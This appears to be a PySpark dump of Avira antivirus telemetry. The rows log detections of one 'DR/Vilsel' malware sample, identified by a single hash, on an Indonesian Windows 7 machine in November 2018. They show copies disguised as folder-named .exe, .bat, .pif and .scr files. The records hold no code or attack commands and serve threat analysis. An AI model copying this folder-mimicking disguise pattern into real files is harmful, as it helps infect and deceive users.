  Row(detection=Row(filename='of duty.exe', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Of Duty.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143006-fd23bbfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143006-FD23BBFB', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:30:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='network.bat', filepath='C:\\Users\\X\\Thunder Network\\Network.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142328-c2a7fc31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142328-C2A7FC31', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142047-aafa94f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142047-AAFA94F4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142101-acf6ed12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142101-ACF6ED12', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143107-063005ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143107-063005EF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:31:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='odawmda2mda=.bat', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\ODAwMDA2MDA=.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='olreg.exe', filepath='C:\\Users\\X\\CyberLink\\OLReg\\OLReg.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='odawmda2mda=.bat', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\ODAwMDA2MDA=.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142834-2137c8ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142834-2137C8AC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142852-2301e46b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142852-2301E46B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142859-23b3bf1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142859-23B3BF1C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142842-2211fe12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142842-2211FE12', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142855-235a52e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142855-235A52E8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142845-225cbe58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142845-225CBE58', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142810-1ede46df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142810-1EDE46DF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142837-21986809', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142837-21986809', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='manual.exe', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Docs\\Help\\Manual\\Manual.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-143615-33656181', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-143615-33656181', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142933-f850024b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142933-F850024B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='manual.exe', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Docs\\Help\\Manual\\Manual.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:10:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142908-249abd66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142908-249ABD66', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142848-22ab1538', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142848-22AB1538', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142914-2534842d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142914-2534842D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='temp.exe', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\Version_3_2_1_50\\Temp\\Temp.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142911-24ec1076', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142911-24EC1076', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='support.exe', filepath='C:\\Users\\X\\Documents\\Dota\\support\\support.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='support.exe', filepath='C:\\Users\\X\\Documents\\Dota\\support\\support.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:10:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142905-2451a320', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142905-2451A320', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='{e303ba32-9368-4a3c-ae3a-afdadcbde48b}.scr', filepath='C:\\Users\\X\\CyberLink\\OLReg\\HKEY_CLASS_ROOT\\CLSID\\{E303BA32-9368-4a3c-AE3A-AFDADCBDE48B}\\{E303BA32-9368-4a3c-AE3A-AFDADCBDE48B}.scr', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T07:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:10:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='{e303ba32-9368-4a3c-ae3a-afdadcbde48b}.scr', filepath='C:\\Users\\X\\CyberLink\\OLReg\\HKEY_CLASS_ROOT\\CLSID\\{E303BA32-9368-4a3c-AE3A-AFDADCBDE48B}\\{E303BA32-9368-4a3c-AE3A-AFDADCBDE48B}.scr', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142920-25d0c967', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142920-25D0C967', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:22Z'), dt=datetime.date(2018, 11, 1)),
